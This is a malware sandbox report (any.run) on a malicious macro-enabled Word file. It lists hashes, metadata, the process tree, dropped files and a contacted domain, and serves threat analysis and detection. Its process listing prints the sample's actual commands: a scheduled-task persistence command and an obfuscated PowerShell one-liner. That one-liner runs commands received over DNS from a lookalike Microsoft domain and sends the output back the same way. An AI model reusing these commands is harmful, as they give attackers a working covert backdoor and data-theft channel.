File name: | a3ae8972e68a86067afcf60c88240a19b0d6419bc55f0a56d39ee58ea88410ae |
Full analysis: | https://app.any.run/tasks/a78bfb65-1af5-4a55-869e-8e0df5d59c31 |
Verdict: | Malicious activity |
Analysis date: | February 11, 2019, 09:35:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 3346698F95929B5FF3AEE454E400C427 |
SHA1: | 5B5FAEB145D572EA07B2A0D7740CE8E010A3072D |
SHA256: | A3AE8972E68A86067AFCF60C88240A19B0D6419BC55F0A56D39EE58EA88410AE |
SSDEEP: | 12288:o2NVJRBKwEwB9s6Lv4ixxZULLYvk28tAad12+Z6JcD9bZ0450YgX5hXBChnxv2rS:lJRBCwbD4i5UosHR2+ZtR9F50N5hXUh/ |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
Description: | - |
Creator: | Windows User |
Subject: | - |
Title: | - |
ModifyDate: | 2019:02:04 11:46:00Z |
CreateDate: | 2019:02:04 08:36:00Z |
RevisionNumber: | 4 |
LastModifiedBy: | Windows User |
Keywords: | - |
AppVersion: | 16 |
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 6086 |
LinksUpToDate: | No |
Company: | - |
TitlesOfParts: | - |
HeadingPairs: | |
ScaleCrop: | No |
Paragraphs: | 12 |
Lines: | 43 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 5188 |
Words: | 910 |
Pages: | 3 |
TotalEditTime: | 3 minutes |
Template: | Normal |
ZipFileName: | [Content_Types].xml |
ZipUncompressedSize: | 1503 |
ZipCompressedSize: | 399 |
ZipCRC: | 0x3f450766 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2976 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\a3ae8972e68a86067afcf60c88240a19b0d6419bc55f0a56d39ee58ea88410ae.docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2528 | schtasks /create /sc minute /mo 1 /tn GppgleTaskUpdate /tr c:\users\public\temporyfile.vbs | C:\Windows\system32\schtasks.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2280 | C:\Windows\System32\WScript.exe "c:\users\public\temporyfile.vbs" | C:\Windows\System32\WScript.exe | — | taskeng.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3388 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -command function HgX($oCE,$Kls,$vPd){([System.Net.Dns]::GetHostAddresses((((-join((65..90)+(97..122)|Get-Random -Count 5|%{[char]$_}))+(RKW $Kls)+(RKW('g2970'))+$vPd+$oCE+'.microsoft-check.com')))|Select-Object 'IPAddressToString').IPAddressToString} function RKW($tdE){for($FIQ=0;$FIQ-lt$tdE.length;$FIQ++){$WXT='{0:X}'-f([int]$tdE[$FIQ]);$hEv+=$WXT}return $hEv} $oCE=(HgX '' 'q' '');if(($oCE.split('.')[0])-eq92){$Kls='';$vPd=100;$npQ='';for($dkp=1;$dkp-le($oCE.split('.')[1]);$dkp++){$QGx='';while($QGx-eq''){$QGx=(HgX '' 'h' (RKW([string]$vPd)))}$Kls+=$QGx+'.';$vPd+=1};foreach($qoI in $Kls.Split('.')){$npQ+=[char][int]$qoI}[string]$Wvk=(cmd /c($npQ-replace'%',' ')) [int]$QYl=$Wvk.length/10;$Saj=0;$WtL=0;$IBW=New-Object System.Collections.ArrayList;for($syg=0;$syg-le$QYl;$syg++){$Saj+=10;$wva='';foreach($MLa in $Wvk[$WtL..$Saj]){$wva+=$MLa}$WtL=$Saj+1;$IBW.Add($wva)}$lAU=100;HgX $IBW.Count 'c' '';foreach($qdg in $IBW){$lAU+=1;HgX(RKW([Convert]::ToBase64String(([System.Text.Encoding]::UTF8.GetBytes($qdg)))))'r'(RKW([string]$lAU))}HgX '' 'f' ''} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
2976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8D04.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3388 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NKSHXHILQ1QR90WY22MX.temp | — | |
MD5:— | SHA256:— | |||
2976 | WINWORD.EXE | C:\Users\admin\Desktop\~$ae8972e68a86067afcf60c88240a19b0d6419bc55f0a56d39ee58ea88410ae.docm | pgc | |
MD5:D792799421927D97DA2C06578295713F | SHA256:1520E05EF3AC27487A9AD874520A0D70D7AF283694F863819339750DEA29A947 | |||
3388 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1a4bfe.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2976 | WINWORD.EXE | C:\users\public\temporyfile.vbs | text | |
MD5:88B392EE0539B08DD1CC7CC123761DD3 | SHA256:F91656C9E6B3F0034979A477E177A216D21CD69F8A8FF261698150763C3D3885 | |||
3388 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:D3776522846C4B6622721A213F627EE5 | SHA256:8E2DCF38F19ECCF737AE9EA6BD5E5B275C5A2E6C1D2B001724727E08426E2174 | |||
2976 | WINWORD.EXE | C:\users\public\temporyfile.tmp | text | |
MD5:F75DA2067EBDBDA2442A09B8C25C41BF | SHA256:58D47E5204AB20D3DFE7701D089AAEE42EB7D039CABA17C5DCADB5902BE81125 | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1BF4FB1FB6F1C260288413F56F261944 | SHA256:0409D38D5FEE81897FDFF1E514D972EFB64D6A538287563290438115E7EFEEF9 | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\a3ae8972e68a86067afcf60c88240a19b0d6419bc55f0a56d39ee58ea88410ae.docm.LNK | lnk | |
MD5:3A78E711CAD4094191F0077410E9D71A | SHA256:C6CC4710F64AE0818FA291B3C20F029CE5CA9300A73514C16A6FD5C3F6EE5673 |
Domain | IP | Reputation |
---|---|---|
PLekd716732393730.microsoft-check.com | | unknown |